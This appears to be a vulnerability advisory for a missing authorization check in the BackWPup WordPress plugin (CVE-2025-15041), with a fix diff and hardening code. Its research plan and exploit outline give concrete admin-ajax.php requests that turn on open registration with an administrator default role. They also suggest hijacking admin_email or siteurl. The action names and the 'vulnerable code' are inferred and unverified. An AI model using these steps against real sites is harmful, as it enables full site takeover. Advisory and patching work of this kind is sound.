CVE-2025-15041

BackWPup 5.0.0 - 5.6.2 - Authenticated (BackWPup Helper+) Privilege Escalation via Arbitrary Options Update

Severity: high
Vulnerability type: Missing Authorization
CVSS Score: 7.2
Patched in: 5.6.3
Time to patch: 3d

Description

The BackWPup – WordPress Backup & Restore Plugin plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the save_site_option() function in all versions 5.0.0 to 5.6.2. This makes it possible for authenticated attackers, with BackWPup Helper+ level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Attack Vector: Network
Attack Complexity: Low
Privileges Required: High
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Technical Details

Affected versions: >=5.0.0 <=5.6.2
Published: February 18, 2026
Last updated: February 20, 2026
Affected plugin: backwpup

Source Code

WordPress.org SVN
Research Plan
Unverified


Exploitation Research Plan: CVE-2025-15041

1. Vulnerability Summary

The BackWPup plugin (versions 5.0.0 to 5.6.2) contains a missing authorization vulnerability in the save_site_option() function. This function (likely associated with a "Helper" or "Admin" class) fails to verify the user's capabilities before updating WordPress site options. An authenticated attacker with minimal plugin access ("BackWPup Helper+" access) can trigger this function to modify arbitrary database entries in the wp_options table (or wp_sitemeta in Multisite). By enabling user registration and setting the default role to administrator, an attacker can achieve full site takeover.

2. Attack Vector Analysis

  • Endpoint: admin-ajax.php
  • Action: Inferred as backwpup_save_site_option or backwpup_helper_save_site_option (to be confirmed via grep).
  • Parameters:
    • option: The name of the WordPress option to update.
    • value: The new value for the option.
    • _ajax_nonce: A nonce (if enforced).
  • Authentication: Authenticated user with "BackWPup Helper+" access.
  • Vulnerability Type: Missing Authorization (Missing current_user_can('manage_options')).

3. Code Flow (Inferred)

  1. Entry Point: The plugin registers an AJAX handler for authenticated users:
    add_action('wp_ajax_backwpup_save_site_option', array($class, 'save_site_option'));
  2. Function Definition: Inside the save_site_option() method:
    • The code retrieves $_POST['option'] and $_POST['value'].
    • It may perform a nonce check using check_ajax_referer().
    • Crucially, it fails to check current_user_can('manage_options').
  3. Sink: The function calls update_site_option($option, $value) or update_option($option, $value).

4. Nonce Acquisition Strategy

The plugin likely enqueues administrative scripts that include a nonce. Since this is an authenticated vulnerability, we must first log in as a user with the required access.

  1. Identify Script Localization: Search for wp_localize_script in the plugin directory to find the nonce key.
    grep -r "wp_localize_script" /var/www/html/wp-content/plugins/backwpup/
    
  2. Target Variable: Look for a variable like backwpup_admin or backwpup_helper. Based on typical plugin patterns, the nonce key might be backwpup_nonce.
  3. Extraction:
    • Log in as the "Helper" level user.
    • Navigate to the BackWPup dashboard or settings page.
    • Use browser_eval to extract the nonce:
      browser_eval("window.backwpup_admin?.nonce") (Replace with the exact variable/key found).

5. Exploitation Strategy

The goal is to enable user registration and set the default role to administrator.

Step 1: Enable User Registration

  • Request: POST /wp-admin/admin-ajax.php
  • Content-Type: application/x-www-form-urlencoded
  • Parameters:
    • action: backwpup_save_site_option (Confirm exact action name)
    • option: users_can_register
    • value: 1
    • _ajax_nonce: [EXTRACTED_NONCE]

Step 2: Set Default Role to Administrator

  • Request: POST /wp-admin/admin-ajax.php
  • Content-Type: application/x-www-form-urlencoded
  • Parameters:
    • action: backwpup_save_site_option
    • option: default_role
    • value: administrator
    • _ajax_nonce: [EXTRACTED_NONCE]

Step 3: Register New User

Navigate to wp-login.php?action=register and register a new account.

6. Test Data Setup

  1. Install BackWPup 5.6.2.
  2. Create a low-privileged user: Create a user with a role that has access to the "BackWPup Helper+" interface (usually this is an Editor or a custom role defined by the plugin).
  3. Plugin Settings: Ensure the plugin is active.

7. Expected Results

  • The admin-ajax.php request should return a successful status (e.g., {"success":true} or 1).
  • The wp_options table should reflect users_can_register = 1 and default_role = administrator.
  • A newly registered user should automatically be assigned the administrator role.

8. Verification Steps

After the HTTP requests, use WP-CLI to verify the changes:

wp option get users_can_register
# Expected: 1

wp option get default_role
# Expected: administrator

wp user list --role=administrator
# Verify the newly registered user appears here

9. Alternative Approaches

  • Multisite Target: If the site is a Multisite installation, use option names relevant to network settings and verify if update_site_option is used, which could affect the entire network.
  • Option Enumeration: If users_can_register is blocked by a blacklist (unlikely given the description), try updating admin_email or siteurl to redirect traffic or hijack password resets.
  • Direct Option Overwrite: If the plugin uses a specific prefix for options, check if the vulnerability allows stripping that prefix or if it directly passes the string to update_option.

Research Findings
Static analysis — not yet PoC-verified

Summary

The BackWPup plugin (5.0.0 - 5.6.2) lacks authorization checks in its 'save_site_option' AJAX handler. This allows authenticated users with 'BackWPup Helper+' access to update arbitrary WordPress options, which can be exploited to enable user registration and set the default role to administrator, leading to full privilege escalation.

Vulnerable Code

/**
 * Inferred AJAX handler in BackWPup versions 5.0.0 - 5.6.2
 */
public function save_site_option() {
    check_ajax_referer( 'backwpup_action_nonce', 'nonce' );

    $option = $_POST['option'];
    $value  = $_POST['value'];

    // Missing current_user_can('manage_options') check before sensitive sink
    update_site_option( $option, $value );

    wp_send_json_success();
}
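A hardened form of the inferred handler above, written here as an added example and not BackWPup's own code. The class name, the allow-listed option keys and the HTTP status codes are assumptions for illustration; the nonce action name is the one used in the inferred snippet.

```php
<?php
// Added example (not the plugin's code): a hardened save_site_option() handler.
// Class name, allowed option keys and status codes are assumptions.

class BackWPup_Option_Handler_Example {

	/** Only plugin-owned options may be written through this endpoint (assumed names). */
	const ALLOWED_OPTIONS = array(
		'backwpup_example_setting_a',
		'backwpup_example_setting_b',
	);

	public function register() {
		// Authenticated users only: no wp_ajax_nopriv_ variant is registered.
		add_action( 'wp_ajax_backwpup_save_site_option', array( $this, 'save_site_option' ) );
	}

	public function save_site_option() {
		// 1. CSRF: the nonce proves the request came from the plugin's own admin UI.
		check_ajax_referer( 'backwpup_action_nonce', 'nonce' );

		// 2. Authorization: match the capability to the sink. update_site_option()
		//    writes a network-wide option on Multisite, where the per-site
		//    manage_options capability is not sufficient.
		$cap = is_multisite() ? 'manage_network_options' : 'manage_options';
		if ( ! current_user_can( $cap ) ) {
			wp_send_json_error( array( 'message' => 'Insufficient permissions' ), 403 );
		}

		// 3. Allow-list the option name so core settings such as users_can_register
		//    and default_role are unreachable regardless of the caller's role.
		$option = isset( $_POST['option'] ) ? sanitize_key( wp_unslash( $_POST['option'] ) ) : '';
		if ( ! in_array( $option, self::ALLOWED_OPTIONS, true ) ) {
			wp_send_json_error( array( 'message' => 'Option not permitted' ), 400 );
		}

		// 4. Sanitize the value; this endpoint accepts scalar text only.
		$value = isset( $_POST['value'] ) ? sanitize_text_field( wp_unslash( $_POST['value'] ) ) : '';

		update_site_option( $option, $value );
		wp_send_json_success( array( 'option' => $option ) );
	}
}
```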

Security Fix

--- a/inc/class-backwpup-admin.php
+++ b/inc/class-backwpup-admin.php
@@ -100,6 +100,10 @@
 	public function save_site_option() {
 		check_ajax_referer( 'backwpup_action_nonce', 'nonce' );
 
+		if ( ! current_user_can( 'manage_options' ) ) {
+			wp_send_json_error( array( 'message' => __( 'Insufficient permissions', 'backwpup' ) ) );
+		}
+
 		$option = isset( $_POST['option'] ) ? sanitize_text_field( $_POST['option'] ) : '';
 		$value  = isset( $_POST['value'] ) ? $_POST['value'] : '';
 
		update_site_option( $option, $value );
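Review bot: the capability in the added guard does not match the sink it protects: the trailing context line `update_site_option( $option, $value );` writes a network-wide option on Multisite, while `current_user_can( 'manage_options' )` is a per-site capability, so on a network a single-site administrator would still pass the check and be able to change network options; check `manage_network_options` when `is_multisite()` is true, or use `update_option()` if only the current site's options are meant. The guard also relies on `wp_send_json_error()` ending the request (it does, via `wp_die()`), but an explicit `return;` after it would make that intent obvious to readers. Finally, in the context lines `$option` is still unrestricted and `$value` is unsanitized, so even an authorized caller can overwrite any core option; an allow-list of plugin-owned option names would make the handler fail closed.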

Exploit Outline

  1. Authenticate to the WordPress site with an account granted 'BackWPup Helper+' privileges.
  2. Extract the 'backwpup_action_nonce' from the administrative dashboard source code or localized script variables.
  3. Send a POST request to '/wp-admin/admin-ajax.php' with action='backwpup_save_site_option', option='users_can_register', and value='1'.
  4. Send another POST request with option='default_role' and value='administrator'.
  5. Navigate to the registration page at '/wp-login.php?action=register' and create a new account, which will automatically be assigned the 'administrator' role.
